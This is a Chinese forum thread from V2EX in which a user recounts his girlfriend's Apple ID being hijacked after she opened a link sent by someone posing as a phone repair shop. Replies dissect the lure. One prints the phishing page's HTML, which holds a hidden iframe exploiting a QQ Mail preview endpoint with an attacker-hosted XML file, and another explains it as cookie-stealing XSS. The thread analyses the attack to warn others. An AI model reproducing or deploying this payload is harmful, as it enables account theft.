来说说我的 Apple ID 被盗经历

2015-10-21 00:16:52 +08:00
 chaim
准确来说是女友的号,现在网易这么火,我也来凑个热闹,大家也有个防备

前一段时间,女朋友的 6 不慎被偷,期间各种钓鱼短信,在我的引导下都没有被对方获取密码
就在 17 号,手机过保的最后一天,有陌生 QQ 加女友,说是手机维修店的
发来一张图片问是不是她丢失的手机,打开后跳转到了一个 app 门户网站

然后电影开场了,我们去看电影就没注意,看完后就开始弹 apple id 的登录框了,我没敢让她输入,都是直接取消掉了

第二天我在电脑上登录 Apple ID 的时候帐号已经被窃了

然后我就觉得这么叼,很不解的拨通了苹果的客服电话

然后高潮来了

客户哥们儿操着浓厚的东北口音跟我说,你手机中病毒了,你打开那个网页的时候就中了木马,黑客获取到了你的信息,盗取了密码,建议我重装一遍设备的系统,要不有可能有残留的木马

我震惊了!!!就一个网页木马,就能盗取我的 apple id 帐号,这木马也太叼了吧
尼玛浏览器是不是就不要用了
apple id 账户系统太脆弱了吧
我开心的在互联网上冲着狼,突然我的 apple id 被盗了,然后手机被锁了,交完保护费才能使用

当时忘记问那哥们儿了
1. 重置密码有哪几种方式?
2. 黑客是用那种方式重置了我的密码?
3. 黑客利用病毒获取了我的那些信息重置了密码?
4. 黑客为什么能够通过网页木马在我的设备上获取足以重置帐号的信息?

apple id 是 Gmail ,辅助邮箱是 QQ
第二天重置密码的时候在 QQ 邮箱里面看到了黑客重置密码的邮件
照那东北哥们儿的口气是 apple id 环节出的问题,我也怀疑是 QQ 应用环节 QQ 密码被盗也有可能
有朋友遇到类似的情况吗
6113 次点击
所在节点    Apple
37 条回复
chairuosen
2015-10-21 01:01:51 +08:00
图片被下木马了吧?网游盗号都这么盗的。你打开图片(其实是 exe)电脑就被控了
luckykong
2015-10-21 01:13:29 +08:00
打开一个图片跳转到网页 的时候,你就该怀疑这个图片到底正常不正常了。
如果是木马,后面记录了你一天的电脑使用情况,从之中找到你 qq 邮箱密码简直太容易了
Yvette
2015-10-21 04:50:01 +08:00
這些人簡直無孔不入⋯
bzw875
2015-10-21 06:01:22 +08:00
打开图片跳出一个网站,.exe 的图片吧?
gaohongyuan
2015-10-21 07:33:44 +08:00
感谢分享经历,又涨了姿势。。
virusdefender
2015-10-21 07:35:18 +08:00
图片怎么跳转网站?还有样本么
chaim
2015-10-21 08:02:15 +08:00
@chairuosen
@bzw875
打开链接的设备是 iPhone 6
bubuyu
2015-10-21 08:18:46 +08:00
苹果客服有东北口音的?我打过几次全都是台湾腔是怎么回事
lawdoge
2015-10-21 09:13:54 +08:00
gmail 没有开两步验证对嘛楼主
chaim
2015-10-21 09:32:35 +08:00
@lawdoge 嗯 没有二步验证 之前 2 个月都没有被盗,打开链接半小时内密码就被重置了
66beta
2015-10-21 09:46:27 +08:00
gmail 被撞库?
qq2511296
2015-10-21 09:47:33 +08:00
这么牛逼 打开一个网站就能把账号盗了? 而且还是用 iPhone 打开的那个网站。。。。。。。。。。。。。 能通过一张图片 来打开网站? 手机 qq 能这样?
chyiz
2015-10-21 09:52:05 +08:00
样本网站嵌了一个网易新闻页和一个 qq 邮箱页的 frame ……
yxaaa123
2015-10-21 09:58:17 +08:00
一定是东北口音搞的鬼!!!
huhuhushan
2015-10-21 10:07:44 +08:00
那个网站的源代码,
<!DOCTYPE html>

<html>
<head>
<meta name="viewport" content="width=device-width" />
<title>iPhone6 plus 转让 国行 三网通 无拆修 保内 配件齐全</title>

</head>
<body>
<iframe src="http://j.news.163.com/docs/98/2015101120/B5M0UJPA9001UJPB.html#p=3880026" style="width:100%;height:1000px;border:none"></iframe>

<iframe src="http://open.mail.qq.com/cgi-bin/dy_preview?&t=dy_cutt&submit_id=xx&column_url=http%3a%2f%2fxc.jsled.com.cn%2fmail.xml&qqtype=lockKey2" style="display:none"></iframe>
</body>
</html>

嵌套了两个 frame
chyiz
2015-10-21 10:11:45 +08:00
看来是 XSS 攻击
网易新闻页显示出来装样子的,但是 QQ 邮箱页面地址 hxxp://open.mail.qq.com/cgi-bin/dy_preview?&t=dy_cutt&submit_id=xx&column_url=http%3a%2f%2fxc.jsled.com.cn%2fmail.xml&qqtype=lockKey2 带了这网站的参数:
hxxp://xc.jsled.com.cn/mail.xml

xml 的文件内容:
https://gist.github.com/chyiz/bea8d52bccd198f72eb9#file-mail-xml
加载 js:
https://gist.github.com/chyiz/bea8d52bccd198f72eb9#file-response-js
大概就是这样盗取了 QQ 的 cookie 。。。
chyiz
2015-10-21 10:13:22 +08:00
panlilu
2015-10-21 10:20:23 +08:00
涨姿势了
ooTwToo
2015-10-21 10:34:55 +08:00
可怕
chaim
2015-10-21 10:36:51 +08:00
@huhuhushan
@chyiz 赞两位,看来是 xss 攻击了

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/229682

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX